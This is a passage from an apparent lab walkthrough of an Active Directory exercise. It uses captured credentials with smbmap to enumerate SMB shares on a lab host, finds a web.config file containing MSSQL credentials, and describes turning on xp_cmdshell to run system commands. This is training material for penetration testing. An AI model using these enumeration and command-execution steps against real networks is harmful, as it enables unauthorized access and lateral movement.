Credentials obtained
We have the username and password for a new user.
So now it will be more enumerations. In the question it says 'Locate a configuration file containing an MSSQL connection string. What is the password for the user listed in this file?'
That means we have to enumerate for files and file shares. Lets use smbmap first to list the shares and their permissions
smbmap -u BR086 -p Welcome1 -H 172.16.7.3
[+] IP: 172.16.7.3:445 Name: inlanefreight.local
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
Department Shares READ ONLY Share for department users
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server shareLets look at Department Shares directory first:
smbmap -u BR086 -p Welcome1 -H 172.16.7.3 -R "Department Shares"
[+] IP: 172.16.7.3:445 Name: inlanefreight.local
Disk Permissions Comment
---- ----------- -------
Department Shares READ ONLY
.\Department Shares\*
dr--r--r-- 0 Fri Apr 1 11:04:17 2022 .
dr--r--r-- 0 Fri Apr 1 11:04:17 2022 ..
dr--r--r-- 0 Fri Apr 1 11:04:51 2022 Accounting
dr--r--r-- 0 Fri Apr 1 11:04:46 2022 Executives
dr--r--r-- 0 Fri Apr 1 11:04:41 2022 Finance
dr--r--r-- 0 Fri Apr 1 11:04:25 2022 HR
dr--r--r-- 0 Fri Apr 1 11:04:19 2022 IT
dr--r--r-- 0 Fri Apr 1 11:04:35 2022 Marketing
dr--r--r-- 0 Fri Apr 1 11:04:30 2022 R&D
.\Department Shares\Accounting\*
dr--r--r-- 0 Fri Apr 1 11:04:51 2022 .
dr--r--r-- 0 Fri Apr 1 11:04:51 2022 ..
dr--r--r-- 0 Fri Apr 1 11:05:17 2022 Private
dr--r--r-- 0 Fri Apr 1 11:04:54 2022 Public
.\Department Shares\Executives\*
dr--r--r-- 0 Fri Apr 1 11:04:46 2022 .
dr--r--r-- 0 Fri Apr 1 11:04:46 2022 ..
dr--r--r-- 0 Fri Apr 1 11:05:15 2022 Private
dr--r--r-- 0 Fri Apr 1 11:04:49 2022 Public
.\Department Shares\Finance\*
dr--r--r-- 0 Fri Apr 1 11:04:41 2022 .
dr--r--r-- 0 Fri Apr 1 11:04:41 2022 ..
dr--r--r-- 0 Fri Apr 1 11:05:12 2022 Private
dr--r--r-- 0 Fri Apr 1 11:04:43 2022 Public
.\Department Shares\HR\*
dr--r--r-- 0 Fri Apr 1 11:04:25 2022 .
dr--r--r-- 0 Fri Apr 1 11:04:25 2022 ..
dr--r--r-- 0 Fri Apr 1 11:05:04 2022 Private
dr--r--r-- 0 Fri Apr 1 11:04:27 2022 Public
.\Department Shares\IT\*
dr--r--r-- 0 Fri Apr 1 11:04:19 2022 .
dr--r--r-- 0 Fri Apr 1 11:04:19 2022 ..
dr--r--r-- 0 Fri Apr 1 11:04:56 2022 Private
dr--r--r-- 0 Fri Apr 1 11:04:22 2022 Public
.\Department Shares\IT\Private\*
dr--r--r-- 0 Fri Apr 1 11:04:56 2022 .
dr--r--r-- 0 Fri Apr 1 11:04:56 2022 ..
dr--r--r-- 0 Fri Apr 1 11:04:59 2022 Development
.\Department Shares\IT\Private\Development\*
dr--r--r-- 0 Fri Apr 1 11:04:59 2022 .
dr--r--r-- 0 Fri Apr 1 11:04:59 2022 ..
fr--r--r-- 1203 Fri Apr 1 11:05:02 2022 web.config
.\Department Shares\Marketing\*
dr--r--r-- 0 Fri Apr 1 11:04:35 2022 .
dr--r--r-- 0 Fri Apr 1 11:04:35 2022 ..
dr--r--r-- 0 Fri Apr 1 11:05:10 2022 Private
dr--r--r-- 0 Fri Apr 1 11:04:38 2022 Public
.\Department Shares\R&D\*
dr--r--r-- 0 Fri Apr 1 11:04:30 2022 .
dr--r--r-- 0 Fri Apr 1 11:04:30 2022 ..
dr--r--r-- 0 Fri Apr 1 11:05:07 2022 Private
dr--r--r-- 0 Fri Apr 1 11:04:33 2022 Public
We got a .config file. Lets download it using smbmap -A option:
Once we open the file we get both the username and password for the SQL database. Lets use mssqlclient.py to authenticate.
AD Lateral MovementOnce we are in we can run cmd commands after typing enable_xp_cmdshell with the format xp_cmdshell whoami /priv.
Last updated
Was this helpful?